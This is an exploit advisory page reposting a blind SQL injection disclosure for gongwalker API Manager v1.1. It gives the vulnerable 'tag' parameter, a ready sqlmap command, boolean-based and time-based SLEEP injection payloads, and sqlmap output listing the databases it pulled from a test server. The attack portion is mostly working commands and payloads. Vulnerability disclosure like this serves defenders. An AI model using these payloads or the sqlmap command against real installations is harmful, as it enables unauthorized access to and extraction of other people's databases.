Gongwalker API Manager 1.1 Blind SQL Injection

2016.02.12
Credit: HaHwul
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

gongwalker API Manager v1.1 - Blind SQL Injection # Exploit Title: gongwalker API Manager v1.1 - Blind SQL Injection # Date: 2016-01-25 # Exploit Author: HaHwul # Exploit Author Blog: www.hahwul.com # Vendor Homepage: https://github.com/gongwalker/ApiManager # Software Link: https://github.com/gongwalker/ApiManager.git # Version: v1.1 # Tested on: Debian # =================== Vulnerability Description =================== # Api Manager's index.php used tag parameters is vulnerable http://127.0.0.1/vul_test/ApiManager/index.php?act=api&tag=1 # ========================= SqlMap Query ========================== # sqlm -u "http://127.0.0.1/vul_test/ApiManager/index.php?act=api&tag=1" --level 4 --dbs --no-cast -p tag # ================= SqlMap Result(get My Test DB) ================= # Parameter: tag (GET) Type: boolean-based blind Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE) Payload: act=api&tag=1' RLIKE (SELECT (CASE WHEN (9435=9435) THEN 1 ELSE 0x28 END)) AND 'uUNb'='uUNb Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind (SELECT) Payload: act=api&tag=1' AND (SELECT * FROM (SELECT(SLEEP(5)))qakZ) AND 'cSPF'='cSPF --- [21:14:21] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu web application technology: Apache 2.4.10 back-end DBMS: MySQL 5.0.11 [21:14:21] [INFO] fetching database names [21:14:21] [INFO] fetching number of databases [21:14:21] [INFO] resumed: 25 [21:14:21] [INFO] resumed: information_schema [21:14:21] [INFO] resumed: " [21:14:21] [INFO] resumed: "" [21:14:21] [INFO] resumed: ' [21:14:21] [INFO] resumed: '' [21:14:21] [INFO] resumed: ''' [21:14:21] [INFO] resumed: api [21:14:21] [INFO] resumed: blackcat [21:14:21] [INFO] resumed: edusec ...


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top